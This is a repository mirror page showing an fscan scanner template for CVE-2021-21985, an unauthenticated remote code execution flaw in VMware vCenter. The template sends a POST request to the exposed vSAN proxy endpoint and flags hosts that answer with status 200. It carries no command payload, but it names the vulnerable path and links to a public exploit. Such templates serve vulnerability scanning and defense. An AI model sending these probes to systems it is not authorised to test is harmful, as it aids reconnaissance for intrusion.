mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-09-14 14:06:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity
ad1c53e3f4
fscan/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml
shadow1ng ad1c53e3f4 更新poc
2021-06-18 10:30:01 +08:00

17 lines
778 B
YAML
Raw Blame History

name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
rules:
- method: POST
path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
headers:
Content-Type: application/json
body: |-
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
expression: |
response.status == 200 && response.body.bcontains(b"result")
detail:
vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
author: envone77
description: "vmware vCenter unauth RCE cve-2021-21985"
links:
- https://www.anquanke.com/post/id/243098
- https://github.com/alt3kx/CVE-2021-21985_PoC
Reference in New Issue View Git Blame Copy Permalink